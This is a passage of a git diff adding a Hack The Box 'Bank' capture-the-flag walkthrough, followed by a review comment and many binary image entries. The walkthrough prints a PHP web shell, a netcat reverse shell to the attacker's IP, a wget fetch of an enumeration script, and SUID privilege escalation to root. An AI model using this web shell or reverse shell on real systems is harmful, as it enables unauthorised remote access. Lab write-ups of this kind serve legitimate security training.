+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bank] → nano nihilist.php.htb
+
+ <****?php echo (system($_GET['go'])); ?>
+
+let's see if we can upload our ticket, therefore uploading our malicious disguised php file.
+
+ 
+
+We have been successful in uploading our ticket containing our malicious nihilist.php.htb file. We can browse to it using our web browser, but for this example we will use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk "http://bank.htb/uploads/nihilist.php.htb?go=id"
+ * Trying 10.10.10.29:80...
+ * TCP_NODELAY set
+ * Connected to bank.htb (10.10.10.29) port 80 (#0)
+ > GET /uploads/nihilist.php.htb?go=id HTTP/1.1
+ > Host: bank.htb
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Thu, 14 Nov 2019 08:27:54 GMT
+ < Server: Apache/2.4.7 (Ubuntu)
+ < X-Powered-By: PHP/5.5.9-1ubuntu4.21
+ < Vary: Accept-Encoding
+ < Content-Length: 107
+ < Content-Type: text/html
+ <
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ * Connection #0 to host bank.htb left intact
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+we see that the malicious php file we uploaded gave us access to the system, we will now use the malicious php file to send us a reverse shell to our second terminal.
+
+We will browse to our malicious php file within our terminal using the curl syntax we used before, and tell it to connect back to us on port 6969. One important thing to note though is that we cannot leave the URL as displayed below.
+
+
+ http://bank.htb/uploads/nihilist.php.htb?go=nc -e /bin/sh 10.10.14.48 6969
+
+
+We need to replace the **spaces** with their equivalent **%20**
+
+
+ http://bank.htb/uploads/nihilist.php.htb?go=nc**%20** -e**%20** /bin/sh**%20** 10.10.14.48**%20** 6969
+
+
+Now let's test it with our corrected URL
+
+_Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 6969
+
+
+_Terminal 2 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk "http://bank.htb/uploads/nihilist.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.48%206969"
+ * Trying 10.10.10.29:80...
+ * TCP_NODELAY set
+ * Connected to bank.htb (10.10.10.29) port 80 (#0)
+ > GET /uploads/nihilist.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.48%206969 HTTP/1.1
+ > Host: bank.htb
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+_Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 6969
+ Connection from 10.10.10.29:52558
+
+ uname -a
+ Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+ cat /home/chris/user.txt
+ 37XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now that we have user access, we need to escalate privileges on this box. For that matter we will first upload linenum.sh on the box using python3's http server module.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → cd _HTB/Bank
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bank] → ls
+ 68576f20e9732f1b2edc4df5b8533230.acc
+ nihilist.php.htb
+ linenum.sh
+ node_modules
+ package-lock.json
+ progress.graphml
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bank] → python3 -m http.server 8000
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.29 - - [14/Nov/2019 09:55:51] "GET /linenum.sh HTTP/1.1" 200 -
+
+
+
+
+_Terminal 2:_
+
+
+ which wget
+ /usr/bin/wget
+
+ wget 10.10.14.48:8000/linenum.sh
+ ./linenum.sh > output.txt
+
+ python -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@bank:/var/www/bank/uploads$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@bank:/var/www/bank/uploads$
+
+
+Now we have a semi-interactive shell Let's navigate to /var/htb/bin to run the binary called **emergency**
+
+
+ www-data@bank:/var/www/bank/uploads$ cd /var/htb/bin
+ cd /var/htb/bin
+
+ www-data@bank:/var/htb/bin$ ls
+ ls
+ emergency
+
+ www-data@bank:/var/htb/bin$ ls -l
+ ls -l
+ total 112
+ -rwsr-xr-x 1 root root 112204 Jun 14 2017 emergency
+
+ www-data@bank:/var/htb/bin$ ./emergency
+ ./emergency
+
+ # id
+ id
+ uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ d5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+Executing the aforementioned binary gave us an elevation of privileges, and we have been able to read the root.txt
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
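Review bot: the privilege escalation in Part 3 jumps to `/var/htb/bin/emergency` without showing what pointed there: the hunk runs `./linenum.sh > output.txt` but never reads `output.txt`, so the reader cannot see the finding; paste the relevant SUID lines of that output or state the finding in prose, and add one sentence on why `-rwsr-xr-x 1 root root ... emergency` matters, since the `euid=0(root)` in the following `id` is the whole point of the section. Formatting in the same hunk: `<****?php` in `nihilist.php.htb` is the converter's mangling of `<`, and the `**%20**` markers spliced into the second example URL are bold markup that puts spaces back into the very URL the text says must not contain spaces; fence both so they render literally, and keep the prose explanation of `%20` outside the URL. The `gobuster -u http://bank.htb/ -w /usr/share/wordlist` line looks truncated (no wordlist file is named) and no output is shown although the prose cites two discovered directories; include the actual command and the matching output lines. Wording: `diretories` should be `directories`, `christos Christopoulos` should be capitalised, and the sentence beginning `we see that the process found the **/balance-transfer/** directory gobuster also found the /uploads/ directory` runs two findings together and should be split into two sentences.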
diff --git a/Easy/img/0.png b/Easy/img/0.png
new file mode 100644
index 0000000..b25d934
Binary files /dev/null and b/Easy/img/0.png differ
diff --git a/Easy/img/10.png b/Easy/img/10.png
new file mode 100644
index 0000000..fda63ed
Binary files /dev/null and b/Easy/img/10.png differ
diff --git a/Easy/img/10_graph.png b/Easy/img/10_graph.png
new file mode 100644
index 0000000..87476c2
Binary files /dev/null and b/Easy/img/10_graph.png differ
diff --git a/Easy/img/11.png b/Easy/img/11.png
new file mode 100644
index 0000000..daa48e9
Binary files /dev/null and b/Easy/img/11.png differ
diff --git a/Easy/img/11_graph.png b/Easy/img/11_graph.png
new file mode 100644
index 0000000..9e4e0f2
Binary files /dev/null and b/Easy/img/11_graph.png differ
diff --git a/Easy/img/12.png b/Easy/img/12.png
new file mode 100644
index 0000000..5c57332
Binary files /dev/null and b/Easy/img/12.png differ
diff --git a/Easy/img/12_graph.png b/Easy/img/12_graph.png
new file mode 100644
index 0000000..12f8260
Binary files /dev/null and b/Easy/img/12_graph.png differ
diff --git a/Easy/img/13.png b/Easy/img/13.png
new file mode 100644
index 0000000..8ba8754
Binary files /dev/null and b/Easy/img/13.png differ
diff --git a/Easy/img/13_graph.png b/Easy/img/13_graph.png
new file mode 100644
index 0000000..0eab972
Binary files /dev/null and b/Easy/img/13_graph.png differ
diff --git a/Easy/img/14.png b/Easy/img/14.png
new file mode 100644
index 0000000..9b14d29
Binary files /dev/null and b/Easy/img/14.png differ
diff --git a/Easy/img/14_graph.png b/Easy/img/14_graph.png
new file mode 100644
index 0000000..02e20f0
Binary files /dev/null and b/Easy/img/14_graph.png differ
diff --git a/Easy/img/15.png b/Easy/img/15.png
new file mode 100644
index 0000000..231146b
Binary files /dev/null and b/Easy/img/15.png differ
diff --git a/Easy/img/15_graph.png b/Easy/img/15_graph.png
new file mode 100644
index 0000000..64c7869
Binary files /dev/null and b/Easy/img/15_graph.png differ
diff --git a/Easy/img/16.png b/Easy/img/16.png
new file mode 100644
index 0000000..5ac3e07
Binary files /dev/null and b/Easy/img/16.png differ
diff --git a/Easy/img/16_graph.png b/Easy/img/16_graph.png
new file mode 100644
index 0000000..77ae6c7
Binary files /dev/null and b/Easy/img/16_graph.png differ
diff --git a/Easy/img/17.png b/Easy/img/17.png
new file mode 100644
index 0000000..4b9df76
Binary files /dev/null and b/Easy/img/17.png differ
diff --git a/Easy/img/17_graph.png b/Easy/img/17_graph.png
new file mode 100644
index 0000000..9ff5e57
Binary files /dev/null and b/Easy/img/17_graph.png differ
diff --git a/Easy/img/18.png b/Easy/img/18.png
new file mode 100644
index 0000000..6febb7f
Binary files /dev/null and b/Easy/img/18.png differ
diff --git a/Easy/img/18_graph.png b/Easy/img/18_graph.png
new file mode 100644
index 0000000..e9d41bd
Binary files /dev/null and b/Easy/img/18_graph.png differ
diff --git a/Easy/img/19.png b/Easy/img/19.png
new file mode 100644
index 0000000..3c28cd4
Binary files /dev/null and b/Easy/img/19.png differ
diff --git a/Easy/img/19_graph.png b/Easy/img/19_graph.png
new file mode 100644
index 0000000..b07e6cc
Binary files /dev/null and b/Easy/img/19_graph.png differ
diff --git a/Easy/img/1_graph.png b/Easy/img/1_graph.png
new file mode 100644
index 0000000..e95c774
Binary files /dev/null and b/Easy/img/1_graph.png differ
diff --git a/Easy/img/2.png b/Easy/img/2.png
new file mode 100644
index 0000000..2561396
Binary files /dev/null and b/Easy/img/2.png differ
diff --git a/Easy/img/20.png b/Easy/img/20.png
new file mode 100644
index 0000000..43c1ada
Binary files /dev/null and b/Easy/img/20.png differ
diff --git a/Easy/img/20_graph.png b/Easy/img/20_graph.png
new file mode 100644
index 0000000..6e6f511
Binary files /dev/null and b/Easy/img/20_graph.png differ
diff --git a/Easy/img/21.png b/Easy/img/21.png
new file mode 100644
index 0000000..5f13b0c
Binary files /dev/null and b/Easy/img/21.png differ
diff --git a/Easy/img/21_graph.png b/Easy/img/21_graph.png
new file mode 100644
index 0000000..46c11fb
Binary files /dev/null and b/Easy/img/21_graph.png differ
diff --git a/Easy/img/22.png b/Easy/img/22.png
new file mode 100644
index 0000000..2434dde
Binary files /dev/null and b/Easy/img/22.png differ
diff --git a/Easy/img/22_graph.png b/Easy/img/22_graph.png
new file mode 100644
index 0000000..ad5723a
Binary files /dev/null and b/Easy/img/22_graph.png differ
diff --git a/Easy/img/23.png b/Easy/img/23.png
new file mode 100644
index 0000000..f4f5f0f
Binary files /dev/null and b/Easy/img/23.png differ
diff --git a/Easy/img/23_graph.png b/Easy/img/23_graph.png
new file mode 100644
index 0000000..d734929
Binary files /dev/null and b/Easy/img/23_graph.png differ
diff --git a/Easy/img/24.png b/Easy/img/24.png
new file mode 100644
index 0000000..14cd97b
Binary files /dev/null and b/Easy/img/24.png differ
diff --git a/Easy/img/24_graph.png b/Easy/img/24_graph.png
new file mode 100644
index 0000000..887ea9d
Binary files /dev/null and b/Easy/img/24_graph.png differ
diff --git a/Easy/img/25.png b/Easy/img/25.png
new file mode 100644
index 0000000..3b6f21c
Binary files /dev/null and b/Easy/img/25.png differ
diff --git a/Easy/img/25_graph.png b/Easy/img/25_graph.png
new file mode 100644
index 0000000..0719ced
Binary files /dev/null and b/Easy/img/25_graph.png differ
diff --git a/Easy/img/26.png b/Easy/img/26.png
new file mode 100644
index 0000000..c2e7fce
Binary files /dev/null and b/Easy/img/26.png differ
diff --git a/Easy/img/26_graph.png b/Easy/img/26_graph.png
new file mode 100644
index 0000000..e9af1e0
Binary files /dev/null and b/Easy/img/26_graph.png differ
diff --git a/Easy/img/27.png b/Easy/img/27.png
new file mode 100644
index 0000000..b68dc34
Binary files /dev/null and b/Easy/img/27.png differ
diff --git a/Easy/img/27_graph.png b/Easy/img/27_graph.png
new file mode 100644
index 0000000..ad7c18b
Binary files /dev/null and b/Easy/img/27_graph.png differ
diff --git a/Easy/img/28.png b/Easy/img/28.png
new file mode 100644
index 0000000..e317357
Binary files /dev/null and b/Easy/img/28.png differ
diff --git a/Easy/img/28_graph.png b/Easy/img/28_graph.png
new file mode 100644
index 0000000..c35a4ea
Binary files /dev/null and b/Easy/img/28_graph.png differ
diff --git a/Easy/img/29.png b/Easy/img/29.png
new file mode 100644
index 0000000..1c7a807
Binary files /dev/null and b/Easy/img/29.png differ
diff --git a/Easy/img/29_graph.png b/Easy/img/29_graph.png
new file mode 100644
index 0000000..2bc211e
Binary files /dev/null and b/Easy/img/29_graph.png differ
diff --git a/Easy/img/2_graph.png b/Easy/img/2_graph.png
new file mode 100644
index 0000000..c0fa1c2
Binary files /dev/null and b/Easy/img/2_graph.png differ
diff --git a/Easy/img/3.png b/Easy/img/3.png
new file mode 100644
index 0000000..c0e994b
Binary files /dev/null and b/Easy/img/3.png differ
diff --git a/Easy/img/30.png b/Easy/img/30.png
new file mode 100644
index 0000000..b18bb9b
Binary files /dev/null and b/Easy/img/30.png differ
diff --git a/Easy/img/30_graph.png b/Easy/img/30_graph.png
new file mode 100644
index 0000000..2136d77
Binary files /dev/null and b/Easy/img/30_graph.png differ
diff --git a/Easy/img/31.png b/Easy/img/31.png
new file mode 100644
index 0000000..0fc9a7f
Binary files /dev/null and b/Easy/img/31.png differ
diff --git a/Easy/img/31_graph.png b/Easy/img/31_graph.png
new file mode 100644
index 0000000..f359007
Binary files /dev/null and b/Easy/img/31_graph.png differ
diff --git a/Easy/img/32.png b/Easy/img/32.png
new file mode 100644
index 0000000..578c81c
Binary files /dev/null and b/Easy/img/32.png differ
diff --git a/Easy/img/32_graph.png b/Easy/img/32_graph.png
new file mode 100644
index 0000000..4e5c137
Binary files /dev/null and b/Easy/img/32_graph.png differ
diff --git a/Easy/img/33.png b/Easy/img/33.png
new file mode 100644
index 0000000..62aaa56
Binary files /dev/null and b/Easy/img/33.png differ
diff --git a/Easy/img/33_graph.png b/Easy/img/33_graph.png
new file mode 100644
index 0000000..7bcedd4
Binary files /dev/null and b/Easy/img/33_graph.png differ
diff --git a/Easy/img/34.png b/Easy/img/34.png
new file mode 100644
index 0000000..f5286cb
Binary files /dev/null and b/Easy/img/34.png differ
diff --git a/Easy/img/34_graph.png b/Easy/img/34_graph.png
new file mode 100644
index 0000000..a6b3820
Binary files /dev/null and b/Easy/img/34_graph.png differ
diff --git a/Easy/img/35.png b/Easy/img/35.png
new file mode 100644
index 0000000..44e0a1e
Binary files /dev/null and b/Easy/img/35.png differ
diff --git a/Easy/img/35_graph.png b/Easy/img/35_graph.png
new file mode 100644
index 0000000..da302fd
Binary files /dev/null and b/Easy/img/35_graph.png differ
diff --git a/Easy/img/36.png b/Easy/img/36.png
new file mode 100644
index 0000000..26fd8a1
Binary files /dev/null and b/Easy/img/36.png differ
diff --git a/Easy/img/36_graph.png b/Easy/img/36_graph.png
new file mode 100644
index 0000000..b8effa7
Binary files /dev/null and b/Easy/img/36_graph.png differ
diff --git a/Easy/img/37.png b/Easy/img/37.png
new file mode 100644
index 0000000..f2227da
Binary files /dev/null and b/Easy/img/37.png differ
diff --git a/Easy/img/37_graph.png b/Easy/img/37_graph.png
new file mode 100644
index 0000000..fcefc11
Binary files /dev/null and b/Easy/img/37_graph.png differ
diff --git a/Easy/img/38.png b/Easy/img/38.png
new file mode 100644
index 0000000..824c02b
Binary files /dev/null and b/Easy/img/38.png differ
diff --git a/Easy/img/38_graph.png b/Easy/img/38_graph.png
new file mode 100644
index 0000000..f359b6a
Binary files /dev/null and b/Easy/img/38_graph.png differ
diff --git a/Easy/img/39.png b/Easy/img/39.png
new file mode 100644
index 0000000..d9709c4
Binary files /dev/null and b/Easy/img/39.png differ
diff --git a/Easy/img/39_graph.png b/Easy/img/39_graph.png
new file mode 100644
index 0000000..dc3bd30
Binary files /dev/null and b/Easy/img/39_graph.png differ
diff --git a/Easy/img/3_graph.png b/Easy/img/3_graph.png
new file mode 100644
index 0000000..c2538a2
Binary files /dev/null and b/Easy/img/3_graph.png differ
diff --git a/Easy/img/4.png b/Easy/img/4.png
new file mode 100644
index 0000000..5872eaa
Binary files /dev/null and b/Easy/img/4.png differ
diff --git a/Easy/img/40.png b/Easy/img/40.png
new file mode 100644
index 0000000..c0654ed
Binary files /dev/null and b/Easy/img/40.png differ
diff --git a/Easy/img/40_graph.png b/Easy/img/40_graph.png
new file mode 100644
index 0000000..4c2883c
Binary files /dev/null and b/Easy/img/40_graph.png differ
diff --git a/Easy/img/41.png b/Easy/img/41.png
new file mode 100644
index 0000000..1befcb0
Binary files /dev/null and b/Easy/img/41.png differ
diff --git a/Easy/img/41_graph.png b/Easy/img/41_graph.png
new file mode 100644
index 0000000..c5864e3
Binary files /dev/null and b/Easy/img/41_graph.png differ
diff --git a/Easy/img/42.png b/Easy/img/42.png
new file mode 100644
index 0000000..e40b8c6
Binary files /dev/null and b/Easy/img/42.png differ
diff --git a/Easy/img/42_graph.png b/Easy/img/42_graph.png
new file mode 100644
index 0000000..dea2adf
Binary files /dev/null and b/Easy/img/42_graph.png differ
diff --git a/Easy/img/43.png b/Easy/img/43.png
new file mode 100644
index 0000000..add99b8
Binary files /dev/null and b/Easy/img/43.png differ
diff --git a/Easy/img/43_graph.png b/Easy/img/43_graph.png
new file mode 100644
index 0000000..1b9fc53
Binary files /dev/null and b/Easy/img/43_graph.png differ
diff --git a/Easy/img/44.png b/Easy/img/44.png
new file mode 100644
index 0000000..6694554
Binary files /dev/null and b/Easy/img/44.png differ
diff --git a/Easy/img/44_graph.png b/Easy/img/44_graph.png
new file mode 100644
index 0000000..5f58140
Binary files /dev/null and b/Easy/img/44_graph.png differ
diff --git a/Easy/img/45.png b/Easy/img/45.png
new file mode 100644
index 0000000..847a36c
Binary files /dev/null and b/Easy/img/45.png differ
diff --git a/Easy/img/45_graph.png b/Easy/img/45_graph.png
new file mode 100644
index 0000000..08c3fef
Binary files /dev/null and b/Easy/img/45_graph.png differ
diff --git a/Easy/img/46.png b/Easy/img/46.png
new file mode 100644
index 0000000..6d41bcf
Binary files /dev/null and b/Easy/img/46.png differ
diff --git a/Easy/img/46_graph.png b/Easy/img/46_graph.png
new file mode 100644
index 0000000..d9c056e
Binary files /dev/null and b/Easy/img/46_graph.png differ
diff --git a/Easy/img/47.png b/Easy/img/47.png
new file mode 100644
index 0000000..b30a033
Binary files /dev/null and b/Easy/img/47.png differ
diff --git a/Easy/img/47_graph.png b/Easy/img/47_graph.png
new file mode 100644
index 0000000..c429b7f
Binary files /dev/null and b/Easy/img/47_graph.png differ
diff --git a/Easy/img/48.png b/Easy/img/48.png
new file mode 100644
index 0000000..1b83e0e
Binary files /dev/null and b/Easy/img/48.png differ
diff --git a/Easy/img/48_graph.png b/Easy/img/48_graph.png
new file mode 100644
index 0000000..635ada7
Binary files /dev/null and b/Easy/img/48_graph.png differ
diff --git a/Easy/img/49.png b/Easy/img/49.png
new file mode 100644
index 0000000..b7a38fe
Binary files /dev/null and b/Easy/img/49.png differ
diff --git a/Easy/img/49_graph.png b/Easy/img/49_graph.png
new file mode 100644
index 0000000..d347eb7
Binary files /dev/null and b/Easy/img/49_graph.png differ
diff --git a/Easy/img/4_graph.png b/Easy/img/4_graph.png
new file mode 100644
index 0000000..07e52e9
Binary files /dev/null and b/Easy/img/4_graph.png differ
diff --git a/Easy/img/5.png b/Easy/img/5.png
new file mode 100644
index 0000000..ec00e28
Binary files /dev/null and b/Easy/img/5.png differ
diff --git a/Easy/img/50.png b/Easy/img/50.png
new file mode 100644
index 0000000..7841b46
Binary files /dev/null and b/Easy/img/50.png differ
diff --git a/Easy/img/50_graph.png b/Easy/img/50_graph.png
new file mode 100644
index 0000000..b1df24f
Binary files /dev/null and b/Easy/img/50_graph.png differ
diff --git a/Easy/img/51.png b/Easy/img/51.png
new file mode 100644
index 0000000..e5f9dc8
Binary files /dev/null and b/Easy/img/51.png differ
diff --git a/Easy/img/51_graph.png b/Easy/img/51_graph.png
new file mode 100644
index 0000000..852c8e4
Binary files /dev/null and b/Easy/img/51_graph.png differ
diff --git a/Easy/img/52.png b/Easy/img/52.png
new file mode 100644
index 0000000..d61aaf3
Binary files /dev/null and b/Easy/img/52.png differ
diff --git a/Easy/img/52_graph.png b/Easy/img/52_graph.png
new file mode 100644
index 0000000..06fc036
Binary files /dev/null and b/Easy/img/52_graph.png differ
diff --git a/Easy/img/53.png b/Easy/img/53.png
new file mode 100644
index 0000000..60783eb
Binary files /dev/null and b/Easy/img/53.png differ
diff --git a/Easy/img/53_graph.png b/Easy/img/53_graph.png
new file mode 100644
index 0000000..9714ae8
Binary files /dev/null and b/Easy/img/53_graph.png differ
diff --git a/Easy/img/54.png b/Easy/img/54.png
new file mode 100644
index 0000000..2807752
Binary files /dev/null and b/Easy/img/54.png differ
diff --git a/Easy/img/54_graph.png b/Easy/img/54_graph.png
new file mode 100644
index 0000000..190e3dd
Binary files /dev/null and b/Easy/img/54_graph.png differ
diff --git a/Easy/img/55.png b/Easy/img/55.png
new file mode 100644
index 0000000..30879df
Binary files /dev/null and b/Easy/img/55.png differ
diff --git a/Easy/img/55_graph.png b/Easy/img/55_graph.png
new file mode 100644
index 0000000..a166bea
Binary files /dev/null and b/Easy/img/55_graph.png differ
diff --git a/Easy/img/56.png b/Easy/img/56.png
new file mode 100644
index 0000000..96106d8
Binary files /dev/null and b/Easy/img/56.png differ
diff --git a/Easy/img/56_graph.png b/Easy/img/56_graph.png
new file mode 100644
index 0000000..b1dc4b6
Binary files /dev/null and b/Easy/img/56_graph.png differ
diff --git a/Easy/img/57.png b/Easy/img/57.png
new file mode 100644
index 0000000..3163655
Binary files /dev/null and b/Easy/img/57.png differ
diff --git a/Easy/img/57_graph.png b/Easy/img/57_graph.png
new file mode 100644
index 0000000..c58e26e
Binary files /dev/null and b/Easy/img/57_graph.png differ
diff --git a/Easy/img/58.png b/Easy/img/58.png
new file mode 100644
index 0000000..fd25d27
Binary files /dev/null and b/Easy/img/58.png differ
diff --git a/Easy/img/58_graph.png b/Easy/img/58_graph.png
new file mode 100644
index 0000000..a77f52c
Binary files /dev/null and b/Easy/img/58_graph.png differ
diff --git a/Easy/img/59.png b/Easy/img/59.png
new file mode 100644
index 0000000..3cc9d9f
Binary files /dev/null and b/Easy/img/59.png differ
diff --git a/Easy/img/59_graph.png b/Easy/img/59_graph.png
new file mode 100644
index 0000000..6e19d65
Binary files /dev/null and b/Easy/img/59_graph.png differ
diff --git a/Easy/img/5_graph.png b/Easy/img/5_graph.png
new file mode 100644
index 0000000..7356e67
Binary files /dev/null and b/Easy/img/5_graph.png differ
diff --git a/Easy/img/6.png b/Easy/img/6.png
new file mode 100644
index 0000000..f5a5026
Binary files /dev/null and b/Easy/img/6.png differ
diff --git a/Easy/img/60.png b/Easy/img/60.png
new file mode 100644
index 0000000..136451b
Binary files /dev/null and b/Easy/img/60.png differ
diff --git a/Easy/img/60_graph.png b/Easy/img/60_graph.png
new file mode 100644
index 0000000..82a0215
Binary files /dev/null and b/Easy/img/60_graph.png differ
diff --git a/Easy/img/61.png b/Easy/img/61.png
new file mode 100644
index 0000000..e8a09d8
Binary files /dev/null and b/Easy/img/61.png differ
diff --git a/Easy/img/61_graph.png b/Easy/img/61_graph.png
new file mode 100644
index 0000000..90468de
Binary files /dev/null and b/Easy/img/61_graph.png differ
diff --git a/Easy/img/62.png b/Easy/img/62.png
new file mode 100644
index 0000000..112aa05
Binary files /dev/null and b/Easy/img/62.png differ
diff --git a/Easy/img/62_graph.png b/Easy/img/62_graph.png
new file mode 100644
index 0000000..f3eafbf
Binary files /dev/null and b/Easy/img/62_graph.png differ
diff --git a/Easy/img/63.png b/Easy/img/63.png
new file mode 100644
index 0000000..bb345dd
Binary files /dev/null and b/Easy/img/63.png differ
diff --git a/Easy/img/63_graph.png b/Easy/img/63_graph.png
new file mode 100644
index 0000000..661da02
Binary files /dev/null and b/Easy/img/63_graph.png differ
diff --git a/Easy/img/64.png b/Easy/img/64.png
new file mode 100644
index 0000000..f081301
Binary files /dev/null and b/Easy/img/64.png differ
diff --git a/Easy/img/64_graph.png b/Easy/img/64_graph.png
new file mode 100644
index 0000000..daf354f
Binary files /dev/null and b/Easy/img/64_graph.png differ
diff --git a/Easy/img/65.png b/Easy/img/65.png
new file mode 100644
index 0000000..8d12c97
Binary files /dev/null and b/Easy/img/65.png differ
diff --git a/Easy/img/65_graph.png b/Easy/img/65_graph.png
new file mode 100644
index 0000000..9bc406e
Binary files /dev/null and b/Easy/img/65_graph.png differ
diff --git a/Easy/img/66.png b/Easy/img/66.png
new file mode 100644
index 0000000..2f93342
Binary files /dev/null and b/Easy/img/66.png differ
diff --git a/Easy/img/66_graph.png b/Easy/img/66_graph.png
new file mode 100644
index 0000000..38168c2
Binary files /dev/null and b/Easy/img/66_graph.png differ
diff --git a/Easy/img/67.png b/Easy/img/67.png
new file mode 100644
index 0000000..1383e56
Binary files /dev/null and b/Easy/img/67.png differ
diff --git a/Easy/img/67_graph.png b/Easy/img/67_graph.png
new file mode 100644
index 0000000..186fe9b
Binary files /dev/null and b/Easy/img/67_graph.png differ
diff --git a/Easy/img/68.png b/Easy/img/68.png
new file mode 100644
index 0000000..89c737d
Binary files /dev/null and b/Easy/img/68.png differ
diff --git a/Easy/img/68_graph.png b/Easy/img/68_graph.png
new file mode 100644
index 0000000..71f5c6e
Binary files /dev/null and b/Easy/img/68_graph.png differ
diff --git a/Easy/img/69.png b/Easy/img/69.png
new file mode 100644
index 0000000..69a698b
Binary files /dev/null and b/Easy/img/69.png differ
diff --git a/Easy/img/69_graph.png b/Easy/img/69_graph.png
new file mode 100644
index 0000000..8ce227a
Binary files /dev/null and b/Easy/img/69_graph.png differ
diff --git a/Easy/img/6_graph.png b/Easy/img/6_graph.png
new file mode 100644
index 0000000..2be2c4c
Binary files /dev/null and b/Easy/img/6_graph.png differ
diff --git a/Easy/img/7.png b/Easy/img/7.png
new file mode 100644
index 0000000..d875272
Binary files /dev/null and b/Easy/img/7.png differ
diff --git a/Easy/img/70.png b/Easy/img/70.png
new file mode 100644
index 0000000..fe4ed58
Binary files /dev/null and b/Easy/img/70.png differ
diff --git a/Easy/img/70_graph.png b/Easy/img/70_graph.png
new file mode 100644
index 0000000..6e383ad
Binary files /dev/null and b/Easy/img/70_graph.png differ
diff --git a/Easy/img/71.png b/Easy/img/71.png
new file mode 100644
index 0000000..9451061
Binary files /dev/null and b/Easy/img/71.png differ
diff --git a/Easy/img/7_graph.png b/Easy/img/7_graph.png
new file mode 100644
index 0000000..e7bcc94
Binary files /dev/null and b/Easy/img/7_graph.png differ
diff --git a/Easy/img/8.png b/Easy/img/8.png
new file mode 100644
index 0000000..6982855
Binary files /dev/null and b/Easy/img/8.png differ
diff --git a/Easy/img/8_graph.png b/Easy/img/8_graph.png
new file mode 100644
index 0000000..d22dc4c
Binary files /dev/null and b/Easy/img/8_graph.png differ
diff --git a/Easy/img/9.png b/Easy/img/9.png
new file mode 100644
index 0000000..33ea8a2
Binary files /dev/null and b/Easy/img/9.png differ
diff --git a/Easy/img/9_graph.png b/Easy/img/9_graph.png
new file mode 100644
index 0000000..01a83dc
Binary files /dev/null and b/Easy/img/9_graph.png differ
diff --git a/Easy/img/END.png b/Easy/img/END.png
new file mode 100644
index 0000000..f90a9f7
Binary files /dev/null and b/Easy/img/END.png differ
diff --git a/Easy/prg/10_001.png b/Easy/prg/10_001.png
new file mode 100644
index 0000000..226ae6b
Binary files /dev/null and b/Easy/prg/10_001.png differ
diff --git a/Easy/prg/14_001.png b/Easy/prg/14_001.png
new file mode 100644
index 0000000..9248a48
Binary files /dev/null and b/Easy/prg/14_001.png differ
diff --git a/Easy/prg/14_002.png b/Easy/prg/14_002.png
new file mode 100644
index 0000000..aab6b20
Binary files /dev/null and b/Easy/prg/14_002.png differ
diff --git a/Easy/prg/14_003.png b/Easy/prg/14_003.png
new file mode 100644
index 0000000..25d0de1
Binary files /dev/null and b/Easy/prg/14_003.png differ
diff --git a/Easy/prg/15_001.png b/Easy/prg/15_001.png
new file mode 100644
index 0000000..508a469
Binary files /dev/null and b/Easy/prg/15_001.png differ
diff --git a/Easy/prg/15_002.png b/Easy/prg/15_002.png
new file mode 100644
index 0000000..8b366af
Binary files /dev/null and b/Easy/prg/15_002.png differ
diff --git a/Easy/prg/16_001.png b/Easy/prg/16_001.png
new file mode 100644
index 0000000..26d5dc4
Binary files /dev/null and b/Easy/prg/16_001.png differ
diff --git a/Easy/prg/16_002.png b/Easy/prg/16_002.png
new file mode 100644
index 0000000..af88dbe
Binary files /dev/null and b/Easy/prg/16_002.png differ
diff --git a/Easy/prg/16_003.png b/Easy/prg/16_003.png
new file mode 100644
index 0000000..199786b
Binary files /dev/null and b/Easy/prg/16_003.png differ
diff --git a/Easy/prg/17_001.png b/Easy/prg/17_001.png
new file mode 100644
index 0000000..81e40eb
Binary files /dev/null and b/Easy/prg/17_001.png differ
diff --git a/Easy/prg/17_002.png b/Easy/prg/17_002.png
new file mode 100644
index 0000000..efe9396
Binary files /dev/null and b/Easy/prg/17_002.png differ
diff --git a/Easy/prg/19_001.png b/Easy/prg/19_001.png
new file mode 100644
index 0000000..f6d21e6
Binary files /dev/null and b/Easy/prg/19_001.png differ
diff --git a/Easy/prg/19_002.png b/Easy/prg/19_002.png
new file mode 100644
index 0000000..ee5c72e
Binary files /dev/null and b/Easy/prg/19_002.png differ
diff --git a/Easy/prg/19_003.png b/Easy/prg/19_003.png
new file mode 100644
index 0000000..b3b1e94
Binary files /dev/null and b/Easy/prg/19_003.png differ
diff --git a/Easy/prg/19_004.png b/Easy/prg/19_004.png
new file mode 100644
index 0000000..0d92224
Binary files /dev/null and b/Easy/prg/19_004.png differ
diff --git a/Easy/prg/19_005.png b/Easy/prg/19_005.png
new file mode 100644
index 0000000..b3e444b
Binary files /dev/null and b/Easy/prg/19_005.png differ
diff --git a/Easy/prg/23_001.png b/Easy/prg/23_001.png
new file mode 100644
index 0000000..a9b1a67
Binary files /dev/null and b/Easy/prg/23_001.png differ
